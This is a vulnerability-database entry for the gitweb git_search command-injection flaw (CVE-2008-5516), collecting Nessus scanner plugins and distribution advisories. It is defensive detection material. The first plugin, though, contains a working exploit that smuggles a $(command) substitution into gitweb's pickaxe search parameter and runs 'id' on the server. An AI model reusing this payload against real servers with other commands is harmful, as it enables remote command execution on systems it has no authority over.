ID: CVE-2008-5516 | Type: cve | Reporter: cve@mitre.org | Modified: 2018-10-11T20:55:00
Description
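The web interface in git (gitweb) 1.5.x before 1.5.5 allows remote attackers to execute arbitrary commands via shell metacharacters related to git_search. The scanner records below classify this as OS command injection (CWE-78): user-supplied input to gitweb.cgi is passed to a shell without sanitization, so injected commands run with the privileges of the web server. The fixed version differs between sources on this page (the description above says "before 1.5.5", the Nessus remote check says to upgrade to 1.5.6 or later, and each distribution lists its own patched package), so confirm the fixed version against the advisory for your platform.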
{"nessus": [{"lastseen": "2019-02-21T01:14:44", "bulletinFamily": "scanner", "description": "The version of gitweb, a web-enabled interface to the open source distributed version control system Git, hosted on the remote web server fails to sanitize user-supplied input to the 'gitweb.cgi' script of shell metacharacters before passing it to a shell.\n\nAn unauthenticated, remote attacker can leverage this issue to execute arbitrary commands subject to the privileges under which the web server operates.", "modified": "2018-11-15T00:00:00", "id": "GITWEB_GIT_SEARCH_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=53336", "published": "2011-04-08T00:00:00", "title": "GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif ( description )\n{\n script_id(53336);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2008-5516\");\n script_bugtraq_id(33355);\n script_xref(name:\"Secunia\", value:\"33607\");\n\n script_name(english:\"GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a CGI script that can be abused to\nexecute arbitrary commands.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of gitweb, a web-enabled interface to the open source\ndistributed version control system Git, hosted on the remote web\nserver fails to sanitize user-supplied input to the 'gitweb.cgi'\nscript of shell metacharacters before passing it to a shell.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary commands subject to the privileges under which the web\nserver operates.\"\n );\n\n # 
https://repo.or.cz/w/git.git?a=commitdiff;h=c582abae46725504cee9ff91816c979989632f07\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f84acd89\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.5.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nglobal_var cgi, port;\n\nfunction exploit(cmd, regex, repo)\n{\n local_var matches, pattern, res, search, sha_commit, sha_file;\n local_var sha_null, url;\n\n # Get SHA-1 of HEAD.\n url = cgi + \"?p=\" + repo;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<a href=\"[^\"]+\\\\?p=' + repo + ';a=commit;h=([a-z0-9]{40})\">commit</a>';\n matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) return NULL;\n sha_commit = matches[1];\n\n # Get SHA-1 of any file.\n url = cgi + \"?p=\" + repo + \";a=tree;hb=\" + sha_commit;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<a href=\"[^\"]+\\\\?p=' + repo + ';a=blob;f=[^;]+;h=([a-z0-9]{40});hb=' + sha_commit + '\">blob</a>';\n matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) return NULL;\n sha_file = matches[1];\n\n # Exploit.\n sha_null = '0000000000000000000000000000000000000000';\n search = \"%27%27 | \";\n search += 'printf %22' + sha_commit + '\\\\n';\n search += '%3A000000 100644 ' + sha_null + ' ' + sha_file + ' A\\\\t%24%28' + cmd + '%29\\\\n';\n search += sha_null + '\\\\n%22%3B ';\n search += 'echo ' + SCRIPT_NAME + ' \\\\';\n\n search = str_replace(string:search, find:\" \", replace:\"+\");\n\n url = cgi + \"?p=\" + repo + \"&a=search&h=HEAD&st=pickaxe&s=\" + search;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n pattern = '<span class=\"match\">(' + regex + ')</span>';\n 
matches = eregmatch(string:res[2], pattern:pattern);\n if ( isnull(matches) ) exit(0, \"The gitweb instance at \" + build_url(port:port, qs:cgi) + \" appears to be unaffected.\");\n\n return make_list(url, matches[1]);\n}\n\nport = get_http_port(default:80);\n\n# Loop through directories.\nif ( thorough_tests ) dirs = list_uniq(make_list(\"/gitweb\", \"/cgi-bin/gitweb\", \"/git\", \"/code\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\n# Find the gitweb CGI.\nfound = FALSE;\nforeach dir ( dirs )\n{\n foreach ext ( make_list(\"cgi\", \"pl\", \"perl\") )\n {\n url = dir + \"/gitweb.\" + ext;\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n exit_on_fail : TRUE\n );\n\n if (\n '<!-- git web interface version' >!< res[2] &&\n 'meta name=\"generator\" content=\"gitweb' >!< res[2]\n ) continue;\n\n cgi = url;\n found = TRUE;\n break;\n }\n\n if ( found ) break;\n}\nif ( ! found ) exit(0, \"The web server on port \" + port + \" does not appear to host gitweb.\");\n\n# Scrape repository names from page.\npattern = \"\\?p=([^;]+);a=\";\nlines = egrep(string:res[2], pattern:pattern);\nif ( isnull(lines) ) exit(1, \"Failed to find any repositories at \" + build_url(port:port, qs:cgi) + \".\");\n\n# Make a list of repositories.\nrepos = make_list();\nforeach line ( split(lines) )\n{\n matches = eregmatch(string:line, pattern:pattern);\n if ( isnull(matches) ) continue;\n\n repos = make_list(repos, matches[1]);\n}\nif ( max_index(repos) == 0 ) exit(1, \"Failed to parse repositories at \" + build_url(port:port, qs:cgi) + \".\");\n\n# Try to exploit each repo.\ncmd = \"id\";\nregex = \"uid=[0-9]+.*gid=[0-9]+.*\";\nresult = NULL;\nforeach repo ( list_uniq(repos) )\n{\n result = exploit(cmd:cmd, regex:regex, repo:repo);\n if ( ! 
isnull(result) ) break;\n}\nif ( isnull(result) ) exit(0, \"The gitweb instance at \" + build_url(port:port, qs:cgi) + \" appears to be unaffected.\");\n\n# Report our findings.\nif ( report_verbosity > 0 )\n{\n trailer = \"\";\n if ( report_verbosity > 1 )\n {\n trailer =\n '\\n' +\n 'The above URL caused gitweb to execute the command \\'' + cmd + '\\'\\n' +\n 'resulting in the following output :\\n' +\n '\\n ' + data_protection::sanitize_uid(output:result[1]) + '\\n';\n }\n\n report = get_vuln_report(trailer:trailer, items:result[0], port:port);\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-01T02:21:03", "bulletinFamily": "scanner", "description": "It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities :\n\nRemote attackers could use crafted requests to execute shell commands\non the web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5916 ).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell\ncommands with the permission of the web server (CVE-2008-5516,\nCVE-2008-5517 ).", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-1708.NASL", "href": "https://www.tenable.com/plugins/nessus/35425", "published": "2009-01-20T00:00:00", "title": "Debian DSA-1708-1 : git-core - shell command injection", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1708. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35425);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_xref(name:\"DSA\", value:\"1708\");\n\n script_name(english:\"Debian DSA-1708-1 : git-core - shell command injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities :\n\nRemote attackers could use crafted requests to execute shell commands\non the web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5916 ).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell\ncommands with the permission of the web server (CVE-2008-5516,\nCVE-2008-5517 ).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=512330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1708\"\n );\n script_set_attribute(\n 
attribute:\"solution\", \n value:\n\"Upgrade the Git packages.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(78, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"git-arch\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-core\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-cvs\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-daemon-run\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-doc\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"git-email\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif 
(deb_check(release:\"4.0\", prefix:\"git-svn\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gitk\", reference:\"1.4.4.4-4+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gitweb\", reference:\"1.4.4.4-4+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:19", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200903-15\n(git: Multiple vulnerabilties)\n\n Multiple vulnerabilities have been reported in gitweb that is part of\n the git package:\n Shell metacharacters related to git_search are not properly sanitized\n (CVE-2008-5516).\n Shell metacharacters related to git_snapshot and git_object are not\n properly sanitized (CVE-2008-5517).\n The diff.external configuration variable as set in a repository can be\n executed by gitweb (CVE-2008-5916).\n \nImpact :\n\n A remote unauthenticated attacker can execute arbitrary commands via\n shell metacharacters in a query, remote attackers with write access to\n a git repository configuration can execute arbitrary commands with the\n privileges of the user running gitweb by modifying the diff.external\n configuration variable in the repository and sending a crafted query to\n gitweb.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-200903-15.NASL", "href": "https://www.tenable.com/plugins/nessus/35813", "published": "2009-03-10T00:00:00", "title": "GLSA-200903-15 : git: Multiple vulnerabilties", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 
200903-15.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35813);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:45\");\n\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_bugtraq_id(32967, 33355);\n script_xref(name:\"GLSA\", value:\"200903-15\");\n\n script_name(english:\"GLSA-200903-15 : git: Multiple vulnerabilties\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-15\n(git: Multiple vulnerabilties)\n\n Multiple vulnerabilities have been reported in gitweb that is part of\n the git package:\n Shell metacharacters related to git_search are not properly sanitized\n (CVE-2008-5516).\n Shell metacharacters related to git_snapshot and git_object are not\n properly sanitized (CVE-2008-5517).\n The diff.external configuration variable as set in a repository can be\n executed by gitweb (CVE-2008-5916).\n \nImpact :\n\n A remote unauthenticated attacker can execute arbitrary commands via\n shell metacharacters in a query, remote attackers with write access to\n a git repository configuration can execute arbitrary commands with the\n privileges of the user running gitweb by modifying the diff.external\n configuration variable in the repository and sending a crafted query to\n gitweb.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-15\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\n\"All git users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 94, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-util/git\", unaffected:make_list(\"ge 1.6.0.6\"), vulnerable:make_list(\"lt 1.6.0.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:10:46", "bulletinFamily": "scanner", "description": "New git packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.", "modified": "2019-11-02T00:00:00", "id": "SLACKWARE_SSA_2009-051-02.NASL", "href": "https://www.tenable.com/plugins/nessus/35728", "published": "2009-02-23T00:00:00", "title": "Slackware 12.0 / 12.1 / 12.2 / current : git (SSA:2009-051-02)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-051-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35728);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:21\");\n\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_xref(name:\"SSA\", value:\"2009-051-02\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / current : git (SSA:2009-051-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New git packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.414289\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f639500e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_cwe_id(78, 94, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", 
pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"1.6.1.3\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:38:17", "bulletinFamily": "scanner", "description": "It was discovered that Git did not properly handle long file paths. If\na user were tricked into performing commands on a specially crafted\nGit repository, an attacker could possibly execute arbitrary code with\nthe privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not\ncorrectly handle shell metacharacters when processing certain\ncommands. A remote attacker could send specially crafted commands to\nthe Git server and execute arbitrary code with the privileges of the\nGit web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS.\n(CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly\nrestrict the diff.external configuration parameter. A local attacker\ncould exploit this issue and execute arbitrary code with the\nprivileges of the Git web server. This issue only applied to Ubuntu\n8.04 LTS and 8.10. (CVE-2008-5916).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-723-1.NASL", "href": "https://www.tenable.com/plugins/nessus/36720", "published": "2009-04-23T00:00:00", "title": "Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : git-core vulnerabilities (USN-723-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-723-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36720);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_bugtraq_id(32967, 33355);\n script_xref(name:\"USN\", value:\"723-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : git-core vulnerabilities (USN-723-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Git did not properly handle long file paths. If\na user were tricked into performing commands on a specially crafted\nGit repository, an attacker could possibly execute arbitrary code with\nthe privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not\ncorrectly handle shell metacharacters when processing certain\ncommands. 
A remote attacker could send specially crafted commands to\nthe Git server and execute arbitrary code with the privileges of the\nGit web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS.\n(CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly\nrestrict the diff.external configuration parameter. A local attacker\ncould exploit this issue and execute arbitrary code with the\nprivileges of the Git web server. This issue only applied to Ubuntu\n8.04 LTS and 8.10. (CVE-2008-5916).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/723-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(78, 94, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-daemon-run\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-email\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! 